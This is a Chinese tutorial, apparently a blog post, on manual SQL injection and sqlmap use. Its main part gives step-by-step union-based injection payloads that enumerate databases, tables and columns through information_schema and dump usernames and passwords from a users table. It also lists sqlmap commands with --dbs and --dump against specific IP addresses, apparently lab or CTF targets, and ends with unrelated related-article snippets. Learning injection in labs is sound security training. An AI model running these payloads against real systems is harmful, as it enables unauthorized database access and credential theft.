SQLI手动注入和python sqlmap代码注入
sql教程:
https://www.w3school.com.cn/sql/index.asp
数据库:
mysql
oracle
mssql
常用方法
system_user() 系统用户名
user() 用户名
current_user() 当前用户名
session_user() 连接数据库的用户名
database() 数据库名
version() 数据库版本
@@datadir 数据库路径
@@basedir 数据库安装路径
@@version_compile_os 操作系统
concat(str1,str2) 把str1和str2拼接到一起
group_concat() 一次性获取所有的数据库信息information_schema.schemata 包含了数据库里所有的数据库
schema_name 储存了所有数据库的库名
table_schema 数据库名
information_schema.tables 包含了数据库里所有的表
table_name 表名
information_schema.columns 包含了数据库里所有的字段
column_name 字段名
关键字
UNION
order by
注释
#
-- 前后需要空格
-- #
--+ 推荐使用这个,+会解释成空格
推测后台php处理id拼接的方法
$_id = $_GET['id']
如果是整型的话
$_sql = "select username,password from users where id=$_id"
$_sql = "select username,password from users where id="
如果是字符型的话
$_sql = "select username,password from users where id='$_id'"
$_sql = "select username,password from users where id='1' --+'"
【SQL注入方法】:
第一步,推测后台php存在整型注入还是字符型注入
1'
1' --+
1"
1" --+
1')
1') --+
1")
1") --+
第二步,使用order by确定列数
1' order by 1 --+
1' order by 2 --+
1' order by 3 --+
如果执行1' order by 4 --+报错,则只有3列
第三步,使用union 联合查询,将id弄成一个负数或0值,使前面的语句失效,然后看看union查询是否有回显位
?id=0' union select 1,version(),database() --+
查询出所有数据库名
?id=0' union select 1,2,group_concat(schema_name) from information_schema.schemata --+
第四步,查询出指定数据库database()中的所有表名
?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
第五步,查询出指定表’users’中的所有字段名
?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
第六步,查询出指定指定表user中的所有字段数值,0x5c表示用户名和密码用\分割,易于观察
?id=0' union select 1,2,group_concat(username,0x5c,password) from users --+
【job1】如何实现多行结果拼接
sql语句
select first_name from users #查询users表中的姓
select first_name from users --+ 查询users表中的姓
select * from users
select first_name from users where user_id=4 --+ 查询users表中id为4的姓
select version()
SELECT first_name FROM users
UNION
SELECT comment FROM guestbookSELECT first_name FROM users where user_id=1
select comment from guestbookselect concat((SELECT first_name FROM users where user_id=1),(select comment from guestbook))select concat((SELECT first_name FROM users),(select comment from guestbook))select * from information_schema.tables
select table_name from information_schema.tables#以下在security库中查询
select username,`password` from users where id='1'
select username,`password` from users where id=0 union select 1,version(),database(),2select 1select username,`password` from users order by 1
【pytho sqlmap使用方法】
https://github.com/sqlmapproject/sqlmap
python sqlmap.py -h
python sqlmap.py -u "http://220.249.52.134:58790/?inject=1" --dbs
python sqlmap.py -u "http://220.249.52.134:58790/?inject=1" -D supersqli --tables
python sqlmap.py -u "http://129.11.0.246/dvwa/vulnerabilities/sqli/?id=1" -D dvwa -T users --column
python sqlmap.py -u "http://129.11.0.246/dvwa/vulnerabilities/sqli/?id=1" -D dvwa -T users -C user,password --dump
相关文章:
SQLI手动注入和python sqlmap代码注入
sql教程: https://www.w3school.com.cn/sql/index.asp数据库: mysql oracle mssql常用方法 system_user() 系统用户名 user() 用户名 current_user() 当前用户名 session_user() 连接数据库的用户名 d…...
MemcachedRedis构建缓存服务器 (数据持久化,主从同步,哨兵模式)
Memcached/redis是高性能的分布式内存缓存服务器,通过缓存数据库查询结果,减少数据库访问次数,以提高动态Web等应用的速度、 提高可扩展性。降低数据库读的压力 Nsql的优点:高可扩展性,分布式计算,低成本,…...
Python语法基础(变量 注释 数据类型 输入与输出 运算符 缩进)
目录 变量变量命名规则变量的类型变量的创建变量的作用域 注释的方法数据类型对象和引用的概念Number(数字)数据转换 输入与输出输入函数输出函数输出函数的end参数输出格式多行语句 运算符算术运算符赋值运算符三目运算符运算符的优先级 缩进缩进格式注意事项层级嵌套 变量 标…...
linux espeak语音tts;pyttsx3 ubuntu使用
整体使用espeak声音很机械不太自然 1、linux espeak语音tts 安装: sudo apt install espeak使用: #中文男声 espeak -v zh 你好 #中文女声 espeak -v zhf3 你好 #粤语男声 espeak -v zhy 你好注意:espeak -v zh 你好 (Full d…...
小白该如何学习Linux操作系统?
💂 个人网站:【工具大全】【游戏大全】【神级源码资源网】🤟 前端学习课程:👉【28个案例趣学前端】【400个JS面试题】💅 寻找学习交流、摸鱼划水的小伙伴,请点击【摸鱼学习交流群】 Linux作为一种开源操作系…...
2023双十一:实体门店闯入,第二战场全面开战
“闺女,吃饺子了吗?”11月8日,立冬,忙碌一天的陈曦回家路上接到母亲电话,才想起来家里冷冻水饺没了,又不想再去超市,直接打开美团买菜买了两袋,回家就煮了吃。当然,最终她…...
操作系统·处理机调度死锁
3.1 处理机调度概述 3.1.1 处理机调度概述 高级调度 (High level Scheduling)决定把外存上哪些作业调入内存、创建进程、分配资源。高级调度又称作业调度、长程调度或宏观调度。只在批处理系统中有高级调度。 中级调度 (Middle level Scheduling)完成进程的部分或全部在内、…...
SQL第四次上机实验
1.查询借阅了计算机类或者文学类图书的读者的借书证号 USE TSGL GO SELECT DISTINCT Reader.Lno FROM Book,Lend,Reader WHERE Book.ISBNLend.ISBN AND Lend.LnoReader.Lno AND Class 计算机类 OR Class 文学类2.查询同时借阅了计算机类和文学类图书的读者的借书证号 USE T…...
读书笔记:彼得·德鲁克《认识管理》第11章 若干例外及经验教训
一、章节内容概述 例外的服务机构不仅表明服务机构实现卓越绩效不是天方夜谭,而 且指明了实现的方法。这一课,是美国电话电报公司给“自然垄断行业”上的;是19世纪后期处于创建阶段的美国现代大学给学校或医院类机构上的;是20世纪30年代的田纳西河流域管…...
JVM-虚拟机的故障处理与调优案例分析
案例1:大内存硬件上的程序部署策略 一个15万PV/日左右的在线文档类型网站最近更换了硬件系统,服务器的硬件为四路志强处理器、16GB物理内存,操作系统为64位CentOS 5.4,Resin作为Web服务器。整个服务器暂时没有部署别的应用&#…...
JMeter 相关的面试题
📢专注于分享软件测试干货内容,欢迎点赞 👍 收藏 ⭐留言 📝 如有错误敬请指正!📢交流讨论:加入1000人软件测试技术学习交流群📢资源分享:进了字节跳动之后,才…...
你在React项目中是如何使用Redux的? 项目结构是如何划分的?
一、背景 在前面文章了解中,我们了解到redux是用于数据状态管理,而react是一个视图层面的库 如果将两者连接在一起,可以使用官方推荐react-redux库,其具有高效且灵活的特性 react-redux将组件分成: 容器组件&#…...
[每周一更]-(第71期):DevOps 是什么?
Wiki的解释: DevOps(Development和Operations的混成词)是一种重视“软件开发人员(Dev)”和“IT运维技术人员(Ops)”之间沟通合作的文化、运动或惯例。 通过自动化“软件交付”和“架构变更”的…...
k8s的安装部署,详细过程展示(保姆级安装教程)
k8s应用部署方式演变 在部署应用程序的方式上,主要经历了三个时代: 传统部署:互联网早期,会直接将应用程序部署在物理机上 优点:简单,不需要其它技术的参与 缺点:不能为应用程序定义资源使用…...
基于windows、GDAL2.2.3版本和Java集成安装和使用GDAL库的方法
基于windows、GDAL2.2.3版本和Java集成安装和使用GDAL库的方法 一、下载gdal windows版本64位2.2.3版本 下载地址: https://www.gisinternals.com/archive.php 找到gdal-202-1911-x64-core.msi下载并安装 安装后默认目录为:C:\Program Files\GDAL 二、…...
AlphaControls控件TsRadioGroup的使用
通常使用AlphaControls控件中的TsRadioGroup时,往往使用默认值,会造成TsRadioGroup标题被TsRadioGroup的ITEMs占用,严重影响美观: 解决方案,通过对TsRadioGroup的ContentVOffset属性,设置为10。即可立即改善…...
)
安卓常见设计模式8------享元模式(Kotlin版)
1. W1 是什么,什么是享元模式? 享元模式(Flyweight Pattern)是一种结构型设计模式,用于有效地支持大量细粒度的对象共享。在 Android 中,享元模式可以用于减少内存使用和提高性能,特别是在需…...
day54 django中orm数据库增删改查
昨日内容回顾 三板斧问题 HttpResponse # 返回的是字符串 render # 渲染一个HTML静态文件,模板文件 redirect # 重定向的 """在视图文件中得视图函数必须要接收一个形参request,并且,视图…...
【js逆向实战】某sakura动漫视频逆向
写在前面 再写一个逆向实战,后面写点爬虫程序来实现一下。 网站简介与逆向目标 经典的一个视频网站,大多数视频网站走的是M3U8协议,就是一个分段传输,其实这里就有两个分支。 通过传统的m3u8协议,我们可以直接进行分…...
L2-015 互评成绩
学生互评作业的简单规则是这样定的:每个人的作业会被k个同学评审,得到k个成绩。系统需要去掉一个最高分和一个最低分,将剩下的分数取平均,就得到这个学生的最后成绩。本题就要求你编写这个互评系统的算分模块。 输入格式…...
)
麒麟V10离线环境求生指南:如何正确下载并安装Ubuntu deb包(附国内镜像源地址)
麒麟V10离线环境高效运维:deb包全链路解决方案与实战技巧 在国产化操作系统逐步普及的今天,麒麟V10作为基于Ubuntu的成熟发行版,已广泛应用于各类关键基础设施领域。但许多运维工程师在实际工作中常遇到一个棘手问题:如何在完全离…...
OpenCV主库与Contrib扩展版本匹配避坑指南:以Ubuntu 22.04 + OpenCV 4.5.5为例
OpenCV主库与Contrib扩展版本匹配避坑指南:以Ubuntu 22.04 OpenCV 4.5.5为例 在计算机视觉开发中,OpenCV无疑是最受欢迎的库之一。然而,许多开发者在尝试扩展OpenCV功能时,常常会遇到一个看似简单却令人头疼的问题:主…...
3分钟搞定20+输入法词库转换:深蓝词库转换工具终极指南
3分钟搞定20输入法词库转换:深蓝词库转换工具终极指南 【免费下载链接】imewlconverter ”深蓝词库转换“ 一款开源免费的输入法词库转换程序 项目地址: https://gitcode.com/gh_mirrors/im/imewlconverter 你是否曾因为更换电脑或输入法而丢失了多年积累的个…...
3分钟上手TranslucentTB:让你的Windows任务栏变透明的完整指南
3分钟上手TranslucentTB:让你的Windows任务栏变透明的完整指南 【免费下载链接】TranslucentTB A lightweight utility that makes the Windows taskbar translucent/transparent. 项目地址: https://gitcode.com/gh_mirrors/tr/TranslucentTB TranslucentTB…...
Hanime1Plugin终极指南:打造纯净无干扰的Android动画观影体验
Hanime1Plugin终极指南:打造纯净无干扰的Android动画观影体验 【免费下载链接】Hanime1Plugin Android插件(https://hanime1.me) (NSFW) 项目地址: https://gitcode.com/gh_mirrors/ha/Hanime1Plugin 厌倦了烦人的广告弹窗和卡顿的播放体验?Hanim…...
5分钟掌握Rhino到Blender的3D模型导入:开源插件全面指南
5分钟掌握Rhino到Blender的3D模型导入:开源插件全面指南 【免费下载链接】import_3dm Blender importer script for Rhinoceros 3D files 项目地址: https://gitcode.com/gh_mirrors/im/import_3dm 在当今3D设计工作流中,设计师们经常需要在Rhino…...
2025届最火的AI科研助手实测分析
Ai论文网站排名(开题报告、文献综述、降aigc率、降重综合对比) TOP1. 千笔AI TOP2. aipasspaper TOP3. 清北论文 TOP4. 豆包 TOP5. kimi TOP6. deepseek 如今,人工智能技术已深入且广泛地介入学术写作流程,研究者可用各类A…...
如何免费突破百度网盘限速:Python直连解析工具终极指南
如何免费突破百度网盘限速:Python直连解析工具终极指南 【免费下载链接】baidu-wangpan-parse 获取百度网盘分享文件的下载地址 项目地址: https://gitcode.com/gh_mirrors/ba/baidu-wangpan-parse 你是否曾经为百度网盘缓慢的下载速度而烦恼?想要…...
2025届最火的六大AI论文网站推荐
Ai论文网站排名(开题报告、文献综述、降aigc率、降重综合对比) TOP1. 千笔AI TOP2. aipasspaper TOP3. 清北论文 TOP4. 豆包 TOP5. kimi TOP6. deepseek 基于先进深度学习算法构建的 AI 论文查重系统,能针对文本展开语义级精准比对&am…...
从Radare2到Pwndbg:手把手教你用Unicorn Engine给逆向工具写个插件
从Radare2到Pwndbg:用Unicorn Engine构建高级逆向插件的实践指南 逆向工程工具链的扩展能力是安全研究人员最看重的特性之一。当我们需要动态分析加壳代码、模拟执行加密指令或跟踪复杂控制流时,传统调试器的局限性就会显现。本文将展示如何利用Unicorn …...